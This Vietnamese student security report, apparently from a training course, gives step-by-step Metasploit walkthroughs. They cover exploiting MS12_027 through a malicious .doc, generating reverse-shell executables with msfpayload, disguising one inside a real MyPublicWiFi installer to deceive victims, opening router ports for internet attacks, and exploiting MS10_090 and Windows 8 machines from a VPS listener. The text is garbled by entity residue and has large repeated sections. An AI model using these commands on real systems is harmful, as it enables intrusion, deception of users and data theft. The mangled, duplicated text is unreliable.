Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
